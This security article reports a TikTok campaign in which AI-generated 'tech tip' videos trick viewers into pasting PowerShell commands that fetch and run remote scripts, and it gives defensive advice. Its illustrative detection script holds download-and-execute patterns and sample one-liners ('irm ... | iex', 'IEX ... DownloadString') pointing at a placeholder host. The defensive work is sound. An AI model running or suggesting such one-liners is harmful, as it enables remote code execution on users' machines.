Not TikTok!
What do Windows activation hacks, premium Spotify perks, and sketchy PowerShell commands have in common? If you guessed TikTok videos with hundreds of thousands of views, give yourself a gold star, or maybe a malware scan.
In a bizarre-yet-dangerous twist, cybercriminals have ditched the usual fake CAPTCHAs and shady download sites. Instead, they’ve turned to TikTok, where AI-generated “tech tip” videos walk users step-by-step through how to “unlock” apps like Windows, Microsoft Office, CapCut, and Spotify, all by running malicious code in PowerShell.
That’s right: videos that look like harmless life hacks are actually Trojan horses teaching viewers how to hack themselves.
The culprits? A now-defunct crew of TikTok accounts, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. One particularly convincing video promising to “boost your Spotify experience instantly” racked up nearly half a million views, 20,000 likes, and a comment section full of unwitting victims.
According to Trend Micro’s Junestherry Dela Cruz, this marks a new evolution in what’s known as a “ClickFix” attack, where users are lured into running harmful code directly in memory, bypassing traditional antivirus detection. In these TikTok tutorials, users are told to press Windows + R, open PowerShell, and copy a line of code displayed on screen. Boom: system compromised.
“This campaign shows just how far attackers will go to stay on trend, literally,” Dela Cruz said. “They’ll exploit whatever platform is hot right now to spread malware.”

One TikTok video, which tells viewers to run a PowerShell command, has gotten a lot of attention: over 20,000 likes and more than 100 comments. TikTok’s analytics show it’s been viewed nearly 500,000 times. That level of engagement suggests a lot of people saw the video as trustworthy, and many likely followed the instructions, not realizing they were putting their devices at risk.

In the video, the threat actor presents a series of simple, step-by-step instructions, making the malicious process appear both legitimate and easy to follow:
- Press Windows + R
- Type powershell and press Enter
- Execute the following command (please do not attempt):

These instructions are designed to socially engineer viewers into running a PowerShell command that downloads and executes a remote script, ultimately compromising their system.
How to Protect Yourself and Your Business from Social Media Malware
As hackers get smarter, they’re now using social media to spread malware. This means it’s time for businesses and users to rethink their defense strategies. Traditional methods like scanning links and checking domain reputation just aren’t enough anymore. To stay safe, we need a more holistic approach that includes social media monitoring, behavior tracking, and better user education. Here’s how you can stay ahead of the game:
1. Track Social Media Threats
By adding social media threat intelligence to your security toolkit, businesses can spot new attacks early. Monitoring social platforms lets you track high-engagement posts that might be hiding malicious content. Hackers often recycle the same tactics across different platforms, so connecting the dots between posts on Facebook, TikTok, Twitter, and others can help uncover larger, more dangerous campaigns.
2. Monitor User Behavior
Malware isn’t always about code; it can also be about what people do. Security systems should focus on spotting suspicious behavior. If someone suddenly launches a system tool like PowerShell, or downloads files from unknown sources, that’s a red flag. Even small changes, like unauthorized folder creation or tweaks to security settings, can signal an attack.
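One way to turn that behavioral red flag into a detection rule, as an added example that is not from Trend Micro or the original article: it correlates process-creation events with PowerShell script block logging (Event ID 4104) and flags any block that both downloads and executes content, raising severity when the shell was launched by a person through explorer.exe. The event schema, function names, and sample telemetry are assumptions constructed for illustration, and the sample commands are not the command shown in the videos.

```python
import re

# Fetch-remote-content tokens: PowerShell cmdlets, aliases and .NET WebClient methods.
DOWNLOAD = re.compile(
    r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod)\b"
    r"|downloadstring|downloaddata|net\.webclient", re.I)
# Tokens that run a string as code, so the payload never needs to touch disk.
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}

def _exe(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def find_paste_and_run(events):
    """Return (pid, severity) for script blocks that download AND execute.

    Severity is 'high' when the shell was started by explorer.exe (Run dialog,
    Start menu: a person launched it), 'medium' for any other parent.
    """
    user_launched, findings = set(), []
    for ev in events:  # events are assumed to be in time order
        if ev["type"] == "process_create":
            if _exe(ev["image"]) in SHELLS and _exe(ev["parent"]) == "explorer.exe":
                user_launched.add(ev["pid"])
        elif ev["type"] == "script_block":
            if DOWNLOAD.search(ev["text"]) and EXECUTE.search(ev["text"]):
                sev = "high" if ev["pid"] in user_launched else "medium"
                findings.append((ev["pid"], sev))
    return findings

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry (hypothetical schema, reserved .invalid domain).
SAMPLE = [
    {"type": "process_create", "pid": 4120, "image": PS, "parent": r"C:\Windows\explorer.exe"},
    {"type": "script_block", "pid": 4120, "text": "irm https://example.invalid/fix.ps1 | iex"},
    {"type": "process_create", "pid": 5200, "image": PS, "parent": r"C:\Program Files\Agent\agent.exe"},
    {"type": "script_block", "pid": 5200, "text": "Get-Service | Where-Object Status -eq 'Running'"},
    {"type": "script_block", "pid": 5200,
     "text": "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"},
    {"type": "process_create", "pid": 6300, "image": PS, "parent": r"C:\Windows\explorer.exe"},
    {"type": "script_block", "pid": 6300,
     "text": "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv"},
]

if __name__ == "__main__":
    for pid, sev in find_paste_and_run(SAMPLE):
        print(f"pid={pid} severity={sev}")
```

The download-only block from pid 6300 is deliberately not flagged: saving a file is common admin activity, while fetching and executing in one step from a user-launched shell is the pattern these videos coach viewers into.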
3. Boost Social Engineering Awareness
It’s time to go beyond basic phishing training. Employees need to learn how social media can be used to trick them. Encouraging users to question any “too-good-to-be-true” offers, especially those from unverified video sources, can make a huge difference. Whether it’s on social media, messaging apps, or email, always verify before you act.
Bottom line: If someone on TikTok is telling you to run a command in PowerShell, especially to unlock “premium” features for free, don’t do it. Not unless you want to gift hackers your passwords, browsing history, and maybe your soul.